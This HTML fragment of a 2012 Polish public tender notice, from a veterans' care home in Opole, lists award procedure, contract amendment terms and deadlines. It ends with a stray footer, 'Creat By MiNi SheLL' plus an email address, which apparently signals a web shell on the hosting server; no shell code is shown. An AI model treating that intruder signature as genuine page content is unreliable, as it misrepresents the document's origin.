<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem postanowień z art. 144 ust.1 Ustawy Prawo zamówień Publicznych. 
		
W odniesieniu do art. 144 ust. 1 ustawy Prawo zamówień publicznych - Zamawiający 	zastrzega sobie możliwość zmiany umowy w zakresie:									
1.zmniejszenia  ilości usług obejmujących wartość umowy  z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy, w szczególności w przypadku wyłączenia  jakiejkolwiek części budynku,  z zakresu ochrony. W takim wypadku Wykonawca może żądać wyłącznie wynagrodzenia należytego mu z tytułu wykonania części umowy, nie może natomiast żądać odszkodowania ani kar umownych

2. w przypadku braku środków na realizację zadania lub wystąpienia innych nie przewidzianych przyczyn 	Zamawiający dopuszcza możliwość przesunięcia w formie aneksu do umowy ostatecznego terminu 	realizacji przedmiotu umowy lub rezygnacji z części usług.
3.  wysokości wynagrodzenia umownego w przypadku ustawowej zmiany stawki podatku od towarów i usług (VAT);</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dps.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej dla Kombatantów ul. Chmielowicka 6, 45-738 Opole.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2012 godzina 11:30, miejsce: Dom Pomocy Społecznej dla Kombatantów ul. Chmielowicka 6, 45-738 Opole ,sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com